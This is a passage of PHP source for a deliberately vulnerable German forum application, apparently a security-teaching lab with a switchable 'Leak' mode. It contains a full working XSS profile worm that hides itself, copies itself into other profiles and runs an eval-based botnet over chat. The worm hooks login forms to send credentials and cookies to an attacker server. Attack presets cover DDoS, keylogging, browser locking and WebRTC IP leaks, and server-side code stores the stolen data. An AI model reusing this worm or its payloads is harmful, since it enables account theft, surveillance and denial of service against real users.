if(preg_match('/^(Kennwort|Profil|(Anmeld|(Da|Bearbei)t)en)$/',$request)) // Kennwortfragen Sortieren
sort($pass);
if(isset($_GET['page']) and preg_match('/^(\d*)(?:[,\/-](\d+))?$/',$_GET['page'],$var)) {
$page = array($var[0],"page=$var[0]");
$max = max(min(((isset($var[2])) ? $var[2] : $paging[1]),$paging[2]),$paging[0]);
}
else {
$page = array("","");
$max = $paging[1];
}
if(isset($_POST['stop']))
if($mode)
$request = $mode;
elseif($request == 'Admin')
$request = '';
elseif($request == 'Bearbeiten')
$request = 'Profil';
elseif($request != 'CMS')
$request = false;
if($request == '')
if($s == 'b')
$request = 'Blog';
elseif($s == 'm') {
$request = 'Mail';
if(!$mid and $id)
$mid = $id;
}
if(isset($_GET['id']) and preg_match('/^\d+|[cd]$/',$_GET['id']) and $request != 'Profile')
$getopt[] = "id=$_GET[id]";
if($s)
$getopt[] = "s=$s";
if($q)
$getopt[] = "q=".urlencode($q);
if($max != $paging[1])
$getopt[] = "page=,$max";
if($request == 'Mail')
$getopt[] = "s=m";
if($request == 'Blog')
$getopt[] = "s=b";
if(isset($_GET['new']))
$getopt[] = "new=1";
if(!isset($out))
$out = '';
$row = false;
# ZLib Anpassungen ermöglichen
foreach(explode(',','open,close,eof,file,read,write,encode,deflate,inflate') as $var)
if(!isset($gz[$var]))
$gz[$var] = "gz$var";
# Grafiken ausgeben
if($request == 'img' and $img and preg_match('/\d+/',$query,$var)) {
$array = array_values(array_slice($img,0,-1));
$var = ($var[0] < count($array)) ? $var[0] : 0;
if($cache) {
$date = gmdate("D, d M Y H:i:s",$time)." GMT";
header("Cache-Control: public");
header("Etag: $time");
if(($val=(function_exists("apache_request_headers")) ? apache_request_headers() : array())
and isset($val["If-None-Match"]) and isset($val["If-Modified-Since"])
and $val["If-None-Match"] == $time and $val["If-Modified-Since"] == $date
or isset($_SERVER["HTTP_IF_NONE_MATCH"]) and isset($_SERVER["HTTP_IF_MODIFIED_SINCE"])
and $_SERVER["HTTP_IF_NONE_MATCH"] == $time and @$_SERVER["HTTP_IF_MODIFIED_SINCE"] == $date) {
header("HTTP/1.1 304 Not Modified");
exit();
}
header("Pragma: public");
header("Last-Modified: $date");
header("Cache-Control: public, max-age=".($eos*60));
}
header('Content-Type: image/'.(($var == count($array)-1) ? 'x-icon' : 'gif'));
die(substr($gz['inflate'](base64_decode($img[1])),array_sum(array_slice($array,0,$var)),$array[$var]));
}
# Sicherheitslücken per Cookie abschaltbar machen
if(!$leak)
$leak = 0;
else {
if($request == 'Leak') {
$out = "<h3>Sichheitslücken wurden ";
if(isset($_COOKIE['leak']) and !$_COOKIE['leak'])
setcookie('leak',1,time()-$ctl,$self);
else {
setcookie('leak',0,0,$self);
$out .= "de";
}
$out .= "aktiviert!</h3>";
}
if(isset($_COOKIE['leak']))
$leak = ($_COOKIE['leak']) ? $leak : false;
if($leak === 1 or $leak and (preg_match('/^(127(\.\d+){3}|localhost|::1)$/i',$_SERVER['REMOTE_ADDR'])
and isset($_SERVER['SERVER_ADDR']) and $_SERVER['SERVER_ADDR'] == $_SERVER['REMOTE_ADDR'])) { // PHP-Code-Injection aktivieren
$leak = 1;
$creole = array_merge(array(str_replace(array(89,'$'),array('\d',''),key(array_slice($creole,0,1))) => current(array_slice($creole,0,1))),array_slice($creole,1));
$info[0] = ", [[^Creole]]-Formatierung";
}
elseif($leak)
$info[1] = "//PHP-[[::W/)Code_injection|+]] wurde aus Sicherheitsgründen im [[::w/)Quelltext]] deaktiviert. Und sollte nur im abgeschotteten [[::w/Local_Area_Network|Lokalen Netzwerk]] aktiviert und getestet werden!//\n";
}
if($leak) {
if(isset($_COOKIE['to']) and preg_match('!^https?://\S+!',$_COOKIE['to'],$var))
$attack['_jsleak_'] = "'$var[0]'";
$info[2] = "**Alle Daten werden in Klartext gespeichert und können durch ??ak?? ausgelesen werden!**\n";
$info[7] = " (//Nur im [[^Leak^Sicherheitslücken ein/aus Schalten^|Sicherheitsmodus]]//)";
if(!preg_match('!^[\'"]?https?://!',$attack['_jsleak_']))
$info[5] = "Aus Sicherheitsgründen sind die ??ak?? mit relativen bzw. lokalen [[::w/)Pfad(name]]en entwickelt worden, so dass die Daten das ??if?? nie wirklich verlassen. //(Mit dem Nachteil, dass viele [[::w/Sicherheitssoftware|Security-Systeme]] die ??ak?? als ungefährlich einstufen.)//";
}
else
$sql[0] = preg_replace('/CREATE TABLE\s*\[(worm|xss)\][^;]+;/s','',$sql[0]);
# "Externen" Angriffs-Code (JavaScript) zurückgeben
$attack['_worm_'] = "<script>". /* Tagline-Wurm */"
new Image().src = $attack[_jsleak_] + '?tl=' // Kopier-Adresse setzen
+ encodeURIComponent(document.getElementById('tl').innerHTML) // Kompletten Code kopieren
</script>";
if($leak and preg_match('/^(worm(line|test|y?)|(bnps))(?:\.(js|txt))?$/i',$request,$var)) { // Tiny-Profil-Wurm
$code = false;
$val = strtolower($var[1]);
if(substr($val,0,4) == 'worm') {
if($var[2] == 'test' and isset($worm))
$code = $worm;
elseif($var[2] == 'line')
$code = $attack['_worm_'];
elseif($var[2] == 'y')
$code = "Wormy was here!".((isset($query) and $query != '' and preg_match('!^https?://!',$query))
? "\n<p style='display:none'><iframe src='$gqs'></iframe></p>" : '')."<script>
try { var O = new XMLHttpRequest(); } // HTTP für Moderne Browser festlegen
catch(e) { O = new ActiveXObject('Microsoft.XMLHTTP'); } // HTTP für Internet Explorer festlegen
O.open('POST',location.pathname.replace(/(\.php\d*)(\/\w+)?$/,'$1/Bearbeiten'),false); // Benutzer-Profil mit Wurm aktualisieren
O.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); // POST-Request ermöglichen
O.send('profil=' + encodeURIComponent(document.getElementById('profil').innerHTML // Komplettes Benutzerprofil auslesen
.replace(/^[^\\0]*?([^<>]*(?:<(p).*?<\/\\2>)?\s*<(script>)[^\\0]*?<\/\\3)$/i,'$1'))); // Nur den Wurm selber kopieren
</script>";
elseif($var[2] == '')
$code = "<script id='worm' title=\"". /* Umfangreicher Profil-BotWurm mit Tarnung */"
var J,S = [], W,O,R,M = ['0', -1, 10, 0, // M0-3 => Referrer, BotChatID, BotDelay, ReloadDelay
$attack[_jsleak_], // M4 => Hacker-Server
location.pathname.replace(/(\.php\d*).*$/,'$1')], // M5 => Url zum Forum
X = function(R) { // Daten Senden [ url, data ] (O,R)
top.window.bot = new Date().getTime(); // Wurm temporär fixieren (Aktuelle Zeit)
try { O = new XMLHttpRequest() } // HTTP für Moderne Browser festlegen
catch(e) {O = new ActiveXObject('Microsoft.XMLHTTP')} // HTTP für Internet Explorer festlegen
O.open((R[1] ? 'POST' : 'GET'),R[0],false); // GET oder POST-Request absenden
if(R[1]) {
O.setRequestHeader('Content-Type','application/x-www-form-urlencoded');// Post-Request Methode festlegen
O.setRequestHeader('Content-Length',R[1].length);
}
O.send(R[1] ? R[1] : ''); // Daten abschicken".((isset($_COOKIE['debug']) and $_COOKIE['debug']) ? "
R = R[0] + '\\x20->\\x20' + unescape(R[1]) + '\\n' + O.responseText; // Wurm-Requests Debuggen
if(top.jsdebug) top.jsdebug(R); else if(jsdebug) jsdebug(R); // Logs in Debug-Console ausgeben" : "")."
return O.responseText; // Ergebnis zurück
},
Y = function(Y) { // Kurzform für encodeURIComponent
return encodeURIComponent(Y);
},
Z = function(W) { // BotNet [ CC-ID ] (J,W,O,R,M)
if((O=X([M[7],'chat=news:'+M[1]]) // Neue Befehle abrufen, Prüfen und ausführen
.match(/;-?(\d+),(\d+),(?:<!--\s*)?807:([\d-]+),([\d-]+),([^\\0]+?)(\/\/-->|;|$)/)) && W < O[3]) {
R = W, // Aktuelle CC-ID zum Auslesen merken
W = O[3]; // aktuelle Command-ID merken
if(O[4] == 0 || O[4] == M[9]) { // Befehl für Alle oder nur für den einen Bot
J++; // Counter für Empfangene Befehle
try { R = eval(O[5].replace(/%3b/ig,';').replace(/%25/g,'%')) } // Befehl ausführen
catch(e) { R = '3rr0r:%20' + e; } // Fehler zurückgeben
if(R) // Rückgabewert zurückschicken
X([M[7],'chat=call:0,' + Y(R)]);
}
}
if(M[3] && (M[3] -= M[2]) <= 0) // Zwangslogoff zuvorkommen
top.location.reload();
if(W >= 0) // Ein paar Sekunden warten
setTimeout('Z(' + W + ')',M[2] * 1e3);
};
window.onload = function() { // Warten bis Seite komplett geladen ist (W,O,J,M)
if((J = document.getElementsByTagName('meta'))) // Den Timeout-Refesh in Meta-Tags suchen
for(O=0;O<J.length;O++)
if(J[O].httpEquiv == 'refresh')
M[3] = parseInt(J[O].content.match(/(\d+)(?=.*?url=)/i)[1],10) - 300;// 5 Minuten vor Timeout
if((J=document.profile)&&(W=J.profil.value.match(/^([^\\0]*?)(\s+<script[^\\0]+?id=(.?)worm\\3[^\\0]*)$/i))) // Profil?
M[8] = W[2], J.profil.value = W[1], J.onsubmit = function() { // M8 => Wurm verstecken (M)
document.profile.profil.value += M[8]; // Beim speichern Wurm mit dranhängen
};
M[7] = M[5] + '/Chat'; // M7 => Botnet über Chat
M[9] = (J = document.getElementsByTagName('head')[0].innerHTML.match(/Atom\?id=(\d+)\./)) ? J[1] : 0; // M9 => User-ID
M[10] = new Date().getTime(); // M10 => Startzeit des Bot festhalten
Z(J = 0); // BotNet Starten
};
if((J = document.login)) // Login-Fenster Modifizieren, wenn es existiert
J.action = location.href, J.onsubmit = function() { // Beim Absenden eine Funktion ausführen (J,M)
J = document.login;
if(J.username.value || J.password.value) // Wenn Formular ausgefüllt ist,
X([M[4] + '?href=' + Y(location.host + location.pathname) // Logindaten zum Hacker schicken
+ '&data=' + Y(document.cookie + '; user=' + J.username.value
+ '; pass=' + J.password.value) + '&useragent=' + Y(navigator.userAgent)]);
};
if((R=(J=X([M[6]=M[5] + '/Bearbeiten?id'])).match(/(<td[^>]*>.*?(<\/td>)<td[^>]*>.*?\\2)/g))) // M6 => Profil-Link
for(W=0;W<R.length;W++)
if((O = R[W].match(/><b>(.*?):<\/b><\/td><td[^>]*>(?!<em>)(.*?)<\/td>/))) { // Profildaten Suchen
S[W] = Y(O[1]) + '=' + Y(O[2].replace(/<\/?\w+[^>]*>/g,'')); // Daten rausfischen
if((O = O[2].match(/<a .*?onClick='alert\(\w+\([^%]+([\w%]*)/)))
S[W] = S[W].replace(/[^=]*$/,Y(unescape(O[1]))); // Password dekodieren
if((O = R[W].match(/<a.href='(?!#)(?:mailto:)?([#-&,-z]+)/)))
S[W] = S[W].replace(/[^=]*$/,Y(O[1])); // Link dekodieren
}
if(S.length) // Alle Persönlichen Daten zum Hacker schicken!
O = new Image(), O.src = ".preg_replace('/^.+$/',((isset($_COOKIE['debug']) and $_COOKIE['debug'])
? "((top.jsdebug && (S = $0))\n\t\t? top.jsdebug(S) : ((jsdebug) ? jsdebug(S) : S))" : "$0"),
"M[4] + '?worm=1&referer=' + M[0] + '&' + S.join('&')")."; // S kann vom Bot weiter bearbeitet werden
if(!J.match(/ id=(.?)worm\\1|,W,O,R,M=/i) && (O=J.match(/<tex.area.*?>([^\\0]*)<\/tex.area>/))) { // Wurm vorhanden?
if(!O[1].length) // Benutzer hat noch kein Profiltext
O = J.match(/[<]div id='profil'>([^\\0]*)<\/div>[<]\/fieldset>/);
for(S=0;S<80;S++) // Wurm mit 80 Leerzeilen verstecken
O[1] += '\\n';
X([M[6],'profil=' + Y(O[1] + (document.getElementById('worm').outerHTML).replace(/'([\d,]+)(?=',)/, // Wurm Kopieren
'\'' + M[0] + ',' + ((O = document.getElementsByTagName('body')[0].innerHTML.match(/\?mail=(\d+).>Mail an/)) // get UID
? O[1] : ((O = location.href.match(/[?&]id=([\d,]+)/)) ? O[1] : '?'))))]); // Alternativ UID & Abstammung erweitern
} // V- Wurm nur Laden, wenn er noch nicht gestartet wurde oder der Bot 30 Sekunden inaktiv war
\">if(!top.window.bot || new Date().getTime() - top.window.bot > 3e4) // Bot nur einmal starten oder bei 30 sec inaktivtät
eval(document.getElementById('worm').title);</script>";
}
elseif($val == 'bnps') // Angriffs-Presets für den Control-Center
$code = strtr(<<<eof
a.push(
"!Report Bot", // Infos über den Bot und den Browser
"a = function(b) {return b.toUTCString().match(/((?!00)\d\d:)?\d\d:\d\d(?=\s)/)[0];};
'ID:' + W + ' Ref:' + M[0] + ',' + M[9] + ' Wait:' + M[2]
+ ' Timeout:' + a(new Date(M[3] * 1000)) + ' Runtime:' + a(new Date(new Date().getTime()-M[10]))
+ ' Count:' + J + ' ' + top.location.href + '%0aUserAgent:' + navigator.userAgent",
"!Get Bot Time", // Lokale Zeit des Bots ausgeben
"new Date().toString()", // new Date().toLocalString()
"!Reload Bot", // Aktuelle Seite neuladen (Bot neu starten)
"if(J > 1) {
top.location.reload();
'Reloaded'
}",
"!Remove Bot", // Selbst Zerstörung (Profil bleibt erhalten)
"X([M[6],'profil=' + Y(X([M[6]]).match(/[<](textarea).*?>([^\\0]*?)\s+(&(amp;)?lt;|<)script\s(id|title)=[^\\0]+?<\/\\1>/)[2])]);
'Removed'",
"!Sleep Bot", // Bot deaktivieren
"if(J > 1) {
W = -1;
'Sleeping...'
}",
"Chat: Decrypt-Text", // Verschlüsselte Chat-Nachricht entschlüsseln (Nur beim Sender/Empfänger möglich)
"top.CryptoJS.AES.decrypt('##var##'.replace(/^\w+\//,''),top.window.name.replace(/^key:[\w,]+,(?=\w+$)/,'')).toString(top.CryptoJS.enc.Utf8);",
"Chat: Get Keys", // Secret, Public und Script-Keys anzeigen
"a = top.F, b = top.window.name.replace(/^key:/,'').split(',');
(a ? 'n=' + a[2] + '%0ag=' + a[1] + '%0ap=' + a[0] + '%0a' : '') + 'a=' + b[0] + '%0aA=' + b[1] + '%0aK=' + b[2] + '%0a'",
"Debug-Infos", // Alle Bot-Variabeln zurückgeben
"M.join('%0a') + '%0a***%0a' + O.join('%0a') + '%0a***%0a' + [J,S,W].join('%0a')",
"DDoS-Attack,$attack[_xlink_]", // Eine Webseite unter Dauerbeschuss setzen
"a = ['##var##','DDoS-Attack','name','DoS','id','DoS','style','display:none'],
b = top.document.createElement('iframe');
for(c=2;c<a.length;c+=2)
b.setAttribute(a[c],a[c+1]);
top.document.body.appendChild(b);
top.frames.DoS.document.write('<form name=\'DDoS\' target=\'tDDoS\' action=\'' + a[0] + '\' method=\'POST\'>
<input type=\'hidden\' name=\'q\' value=\'' + a[1] + '\'></form><iframe name=\'tDDoS\'></iframe>
<script>setInterval(function(){document.forms[\'DDoS\'].submit()},1000)</script>');
'Open Fire'",
"DDoS-STOP", // Waffenruhe
"if((a = top.document.getElementById('DoS')))
a.parentNode.removeChild(a);
'Peace'",
"Fenster-Titel,Hello World!", // Fenster-Titel ändern
"top.document.getElementsByClassName('title')[0].innerHTML = '##var##'",
"Hacked-Info,Y0u h4v3 b33n H4ck3d!", // Nachricht an den User schicken
"while(confirm('##var##'));
'Confirm'",
"Home-Profil,/Profil", // Das Benutzer-Profil aufrufen
"if(J > 1)
top.location.href = M[5] + '##var##'",
"Keylogger (Bugy)", // Alle Tasten loggen und alle 10 Sekunden zum Hacker schicken
"var a,K = '';
top.document.onkeypress = function(e) {
a = window.event ? event : e;
K += String.fromCharCode(a.keyCode ? a.keyCode : a.charCode);
};
window.setInterval(function() {
if(K != '')
X([M[7],'chat=call:0,' + Y(K)]);
K = '';
},10000);
'Keys logging'",
"Lock Browser,##pass##", // Browserfenster mit Kennwort sichern
"a = top.document.createElement('div');
a.setAttribute('style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);');
top.document.body.appendChild(a);
b = 1;
while(prompt('Enter Password!') != '##var##')
b++;
a.parentNode.removeChild(a);
b + ' try(s)'",
"Place Kitten,$attack[_clink_]", // Alle Standart-Grafiken durch Katzenbilder ersetzen
"for(d=0;d<top.document.images.length;d++)
top.document.images[d].src = '##var##/' + top.document.images[d].width + '/' + top.document.images[d].height + '?' + d;
a = top.document.getElementsByTagName('*');
for(b=0; b < a.length; b++)
if((c = top.window.getComputedStyle(a[b])) && c.backgroundImage && c.backgroundImage != 'none')
a[b].style.backgroundImage = 'url(##var##/' + parseInt(c.width) + '/' + parseInt(c.height) + '?' + d++ + ')';
d + ' Placed'",
"Popup-Layer,468 60 $attack[_blink_]", // Popup Öffnen
"a = top.document.createElement('div'),
b = '##var##'.match(/^(\d+)\D(\d+)\D(.*)$/);
a.setAttribute('style','position:fixed; width:' + (parseInt(b[1]) + 20) + '; height:' + (parseInt(b[2]) + 20) + '; border: 1px solid black;
background-color:white; top:50%; left:50%; transform:translate(-50%,-50%); -webkit-transform:translate(-50%,-50%);');
a.setAttribute('id','popup');
a.innerHTML = '<a style=\'position:absolute; top:-10; left:' + (parseInt(b[1]) + 10 ) + ';
width:20; border-radius:10px; text-align:center; background-color:red; color:white;\'
onclick=\'(a=top.document.getElementById(/popup/.source)).parentNode.removeChild(a)\' title=\'Close\'>X</a>
<iframe src=\'' + b[3] + '\' width=\'' + b[1] + '\' height=\'' + b[2] + '\' style=\'width:100%; height:100%\'></iframe>';
top.document.body.appendChild(a);
'Poping up'",
"Rick Rolling,640 480 $attack[_ylink_]",// Musikvideo abspielen
"a = top.document.createElement('div');
b = ['style','position:fixed; top:0; left:0; width:100%; height:100%; background-color:rgba(0,0,0,0.7);',
'ondblclick','this.parentNode.removeChild(this);','id','ricknroll'];
for(c=0;c<b.length;c+=2)
a.setAttribute(b[c],b[c+1]);
b = '##var##'.match(/^(\d+)\D(\d+)\D(.*)$/);
a.innerHTML = '<iframe src=\'' + b[3] + '\' width=\'' + b[1] + '\' height=\'' + b[2] + '\' frameborder=\'0\'
style=\'position:fixed; top:50%; left:50%; transform:translate(-50%,-50%); -webkit-transform:translate(-50%,-50%);\'></iframe>';
top.document.body.appendChild(a);
'Rick\'n\'Roll'",
"Rick Killing", // Musikvideo entfernen
"if((a = top.document.getElementById('ricknroll'))) {
a.parentNode.removeChild(a);
'Rick killed'
}",
"WebRTC-IPs,2000", // Lokale/Externe IP-Adresse des Bots ausgeben
"a = top.document.createElement('iframe');
a.setAttribute('id','iframe');
a.setAttribute('style','display:none');
a.setAttribute('sandbox','allow-same-origin');
top.document.body.appendChild(a);
function Q(a) {
if((a = /(\d{1,3}(\.\d{1,3}){3}|[a-f\d]{1,4}(:[a-f\d]{1,4}){7})/.exec(a)[1]) && c.indexOf(a) < 0)
c += ',%20' + a;
}
try {
b = !!window.webkitRTCPeerConnection,
c = '',
e = {iceServers: [{urls: 'stun:stun.services.mozilla.com'}]};
if(!(a = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection)) {
d = iframe.contentWindow;
a = d.RTCPeerConnection || d.mozRTCPeerConnection || d.webkitRTCPeerConnection;
b = !!d.webkitRTCPeerConnection;
}
d = {optional: [{RtpDataChannels: true}]};
b = new a(e,d);
b.onicecandidate = function(a) {
if(a.candidate)
Q(a.candidate.candidate);
};
b.createDataChannel('');
b.createOffer(function(a) {
b.setLocalDescription(a, function(){}, function(){});
}, function(){});
} catch(e){};
setTimeout(function() {
try {
a = b.localDescription.sdp.split('%0a');
a.forEach(function(b) {
if(b.indexOf('a=candidate:') === 0)
Q(b);
});
} catch(e){};
if(c != '') {
X([M[7],'chat=call:0,' + c.substr(4)]);
(a = top.document.getElementById('iframe')).parentNode.removeChild(a);
}
},##var##);0",
"Worm-Loader [Install]", // XSS-BotWurm außerhalbs des Profils laden
"a = '';
for(b=0;b<80;b++)
a += '%09';
if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2] + unescape(a) + '<p style=\'display:none\'><iframe src=\'?request=Profil%26id=' + M[9] + '\'></iframe></p>']);
b[2];
}",
"Worm-Loader [Remove]", // XSS-BotWurm Loader deinstallieren
"if((b = X([M[6]]).match(/<(\w+)[^>]*?id=.tl[^>]*?>(.*?)(?:\s*<(\w+).*?<\/\\3>)?\s*<\/\\1>/))) {
X([M[6],'tl=' + b[2]]);
b[2];
}",
"Worm-Loader [Cookie]", // XSS-BotWurm-Loader im Cookie verstecken
"document.cookie='username=' + encodeURI(unescape('%22><script type=%22text/javascript%22 src=%22$self/worm.js%22></script><input type=%22hidden'))");
eof
,array('##pass##' => ($a = explode(' ',$attack['_wordlist_'])) ? $a[rand(0,count($a)-1)] : ''));
if(!$code)
$code = 'Malware not found ;-)';
$code = (isset($var[4]) and $var[4] == "txt" or !isset($var[4]) and preg_match('/[A-Z]/',substr($var[0],0,1))) ? array('plain',trim($code))
: array('javascript',((substr($val,0,4) == 'worm') ? "// Malware mit <script src='$self/$var[0]'></script> installieren!\ndocument.write(\""
.strtr(preg_replace($js,'',$code),array('\\' => '\\\\', '"' => '\\"')).'");' : strtr(preg_replace($js,'',$code),array('\\' => '\\\\'))));
header("Content-Type: text/$code[0]; charset=8859-1");
die($code[1]);
}
# Alle Cookie dauerhaft speichern (1 Jahr)
if($request == 'Cookie') {
$a = 0;
$val = time() + ((isset($_GET['time']) and preg_match('/\d+/',$_GET['time'],$val)) ? $val[0] : $ctl);
foreach($_COOKIE as $key => $var)
if(!preg_match('/^('.preg_quote(session_name()).')$/',$key)) {
$a++;
setcookie($key,$var,$val,$self);
}
if($a)
$out = "<h3>Cookies werden bis zum ".date('d.m.Y H:i:s',$val)." gespeichert!</h3>";
}
# PHP-Version auf min 4.3 und max 7.0 prüfen
if(preg_match('/^(\d+)\.(\d+)/',phpversion(),$var) and ($var[1] < 4 or $var[1] == 4 and $var[2] < 3 or $var[1] >= 7)) {
$out .= "<h1>PHP von 4.3 bis 5.6 wird vorausgesetzt!</h1><h3>Empfohlen wird PHP 5.3 mit SQLite2 Addon!</h3>";
$request = 'Impressum';
$sql = false;
}
# SQLite vorbereiten, testen und bei Fehler neue Datenbank anlegen
elseif($sql) {
foreach(preg_split('/\s+/',$sql[1]) as $val)
if(!isset($sql[$key = strtolower(preg_replace('/[^A-Z]+/','',$val))]))
$sql[$key] = 'sqlite_'.strtolower($val);
if(!function_exists($sql['o']) or !defined('SQLITE_BOTH')) {
$sql = false;
if(defined('SQLITE3_BOTH')) {
$var = "Das <a href='http://mengelke.de/.by'>SQLite3-Addon</a>";
if($val = glob(preg_replace('/(?=\.\w+$)/','*3',basename(__FILE__))) and count($val)) {
header("Location: ".preg_replace('/\/[^\/]*?$/','',$self)."/$val[0]");
header('HTTP/1.0 303 See Other');
$sql = 0;
}
}
else
$var = "Die PHP-Erweiterung SQLite";
$out = "<h1>$var ist nicht installiert!</h1>$out";
}
elseif(!file_exists($base))
if($conn = @$sql['o']($base)) {
$sql['e']($conn,"begin;".preg_replace(array('/\s+/','/\s*(\W)\s*/'),array(' ','$1'),$sql[0])."commit;");
$sql['cl']($conn);
$out = "<h3>Datenbank wurde neu angelegt - Der <a href='$self/Anmelden'>Erste neue Benutzer</a> bekommt Admin-Rechte!</h3>$out";
$request = 'Impressum';
}
else
$out = "<h1>Die Datenbank konnte nicht erstellt werden!</h1>$out";
}
# Datenbank öffnen
if($sql and $conn = @$sql['o']($base,0666)) {
$sql['cf']($conn,'b64d','base64_decode',1);
# Datenbank überprüfen
if($wrt and preg_match_all('/(?:^|[,;])\s*(?:\w+\s\w+\s*\[([\w-]+)|\[([\w-]+))\]/ms',$sql[0],$array)) {
$val = array();
$sql[0] = '';
$array[1][] = $rw = '-';
foreach($array[1] as $key => $var) {
if($var != '') {
if($sql[0] != '') {
if($result = @$sql['q']($conn,$sql[0]) and count($sql[1]) == $rw = $sql['nf']($result)) {
for($a=0; $a < $sql['nf']($result); $a++)
if($sql[1][$a] != $rw = $sql['fn']($result,$a))
$val[] = "$var: $rw <> ".$sql[1][$a];
}
else
$val[] = "$var: $rw != ".count($sql[1])." ".print_r($result,true);
}
$sql[0] = "select * from [$var] limit 0";
$sql[1] = array();
}
else
$sql[1][] = $array[2][$key];
}
if($val) { // Datenbank ist defekt
$debug[] = array($conn,$val,$sql['aq']($conn,"select * from sqlite_master",SQLITE_ASSOC));
$sql['cl']($conn);
// @$sql['cl']($conn); // Bug?
if($svdb) { // Defekte Datenbank sichern
rename($base,$new = preg_replace('/(?=\.\w+$)/',date('_ymdHis'),$base));
if($fr = fopen($new,'rb') and $fw = $gz['open']("$new.gz",'wb')) { // Defekte Datenbank komprimiert sichern
while(!feof($fr))
$gz['write']($fw,fread($fr,1024));
fclose($fr);
$gz['close']($fw);
unlink($new);
}
}
else
unlink($base); // Defekte Datenbank nur löschen
if(file_exists("$base.gz") and ($fr=$gz['open']("$base.gz",'rb')) and ($fw=fopen($base,'wb'))) { // Letztes Backup zurückspielen
while(!gzeof($fr))
fwrite($fw,$gz['read']($fr,1024));
$gz['close']($fr);
fclose($fw);
@touch($base,filemtime("$base.gz"));
}
$out = "<h1>Datenbank ist defekt und wurde gelöscht/zurückgesetzt!</h1>Weiter zum <a href='$self'>Forum</a>$out";
$conn = false;
}
$array = 0;
}
# Prüfen ob die Datenbank beschreibbar ist
$rw = false;
if($conn) {
if(isset($_COOKIE['write']) and $request == 'write') {
setcookie('write',0,time()-$ctl,$self);
unset($_COOKIE['write']);
}
if(!isset($_COOKIE['write']))
for($a=0; $a<3; $a++) {
if(@$sql['e']($conn,"update [user] set id = 0 where 0 = 1") and !$sql['le']($conn)) {
$rw = true;
break;
}
sleep(1);
}
if(!$rw) {
setcookie('write',1,0,$self);
$info[6] = "**++Die Datenbank ist schreibgeschützt! - Daher sind einige Funktionen [[^write^Wieder versuchen die Datenbank zu beschreiben^|deaktiviert]]!++**\n\n";
}
}
}
# Hacker-Code um Daten entgegen zu nehmen
if($sql and $conn and $leak and $rw) {
$wrt = (preg_match('/^(\d+)\.(\d+)/',phpversion(),$var) and ($var[1].$var[2]) > 51) ? 'UTF-8' : 'ISO-8859-1';
# Daten vom XSS-Worm
if(isset($_GET['worm']) and count($_GET) > 1 and $result = $sql['q']($conn,'select * from [worm] where id=0')) {
foreach($_GET as $key => $var)
$line[preg_replace('/&(\w)uml;/','$1e',$key)] = html_entity_decode($var,ENT_NOQUOTES,$wrt);
$row = $sql['nf']($result);
for($a=0;$a<$row;$a++) {
$key = $sql['fn']($result,$a);
if(isset($line[$key]))
$data["[$key]"] = "'".$sql['es']($line[$key])."'";
}
if(isset($data) and count($data) > 0 and isset($line['Benutzername']))
$sql['e']($conn,"
replace into [worm] ([create],".implode(",",array_keys($data)).")
values (datetime('now','localtime'),
".implode(",",array_values($data)).")");
$uid = true;
}
# Daten von XSS-Attacken
if(isset($_GET['href']) and isset($_GET['data'])) {
$data['data'] = $_GET['data'];
foreach(array('sess' => session_name(), 'user' => 'user', 'pass' => 'pass') as $key => $var)
if(preg_match('/'.preg_quote($var,'/').'=([^\s;]*)\s*;?\s*/i',$data['data'],$val)) {
$data[$key] = html_entity_decode($val[1],ENT_NOQUOTES,$wrt);
$data['data'] = str_replace($val[0],'',$data['data']);
}
foreach($data as $key => $var) {
$data["[$key]"] = "nullif('".$sql['es']($var)."','')";
unset($data[$key]);
}
$sql['e']($conn,"
insert into [xss] ([create],[ip],[href],".implode(',',array_keys($data)).",[useragent])
values (datetime('now','localtime'),
'$addr',
'".$sql['es']($_GET['href'])."',".implode(",",$data).",
nullif('".$sql['es'](@$_GET['useragent'])."',''))");
$uid = true;
}
if($uid) // Zur Tarnung eine Grafik zurückgeben
if($img) {
header('Content-Type: image/gif');
die(substr($gz['inflate'](base64_decode($img[1])),0,$img[0]));
}
else
exit;
}
# Smilie Link-Tabelle erstellen
if($img and $img = array_keys($img)) {
foreach($img as $key => $var)
if(preg_match('/(.+)-(.+)/',$var,$val))
$smile[$key+2] = "(".((strlen($val[1]) == 1) ? preg_quote($val[1]) : "[".preg_quote($val[1])."]")
."-?".((strlen($val[2]) == 1) ? preg_quote($val[2]) : "[".preg_quote($val[2])."]")."+)";
if(isset($smile) and is_array($smile) and count($smile))
$smile = array('/(?<=\||\s|^)(~?)('.implode('|',$smile).')(?=<\/?(p|[bh]r|strong|em)[^>]*>|\s|$)/e' =>
"('$1' == '~') ? '$2' : '<img src=\"".$self."/img?'.array_search('$2',explode(',',',$".implode(",$",array_keys($smile))."')).'\" '
.preg_replace('/[^\w\s=\"]/e','\"&#\".ord(\"\\\$0\").\";\"','alt=\"$2\" title=\"$2\"').' border=\"0\" />'");
}
else
$smile = array();
$a = -1; // Creole-Parser um Smilies und Variabeln erweitern
foreach($creole as $key => $var)
if(++$a and $key == '/^$/') {
$creole = array_merge(array_slice($creole,0,$a),$smile,array(
'/([\[\{]?)::([l.])(?=[(\/?# |\])])/e' => '"$1".(("$1" == "") ? "" : (("$2" == ".") ? "%home%" : "%self%")).(("$2" == ".") ? preg_replace("/\/[^\/]*$/","",$self) : $self)',
'/::L(?=[\/?#()\w!&,. -]+)/' => $Self,
'/::H(?=[\/?#()\w!&,.: -]+)/' => preg_replace('/(?<=\w)\/(?=\w|$).*$/','',$Self),
'/(~?)(::([pPb]))(?=[\/?#()\w!&,.: -]+)/e' => '!"$1" && array($a = ("$3" == "b") ? "basename" : "preg_replace", $b = ("$3" == "b") ? array() : array("![^/]*$!",""), $b[] = ("$3" == "P") ? $Self : $self) ? call_user_func_array($a,$b) : "$2"',
'/(.?)::(f)\/(?=[\w!&,.-]+)/ei' => "'$1'.(('\$1' == '[') ? '%file%' : '').(('\$2' == 'F') ? '$Self' : '$self').'/file?'",
'/(.)~\/(?=[\w!&,.-]+)/ei' => "'$1'.(('\$1' == '[') ? '^Profil/)' : '')",
'/(.?)::(w)(?=\/)/ei' => '"$1".(("$1" == "[") ? "%wipe%" : "").(("$2" == "w") ? $wiki : str_replace("de","en",$wiki))',
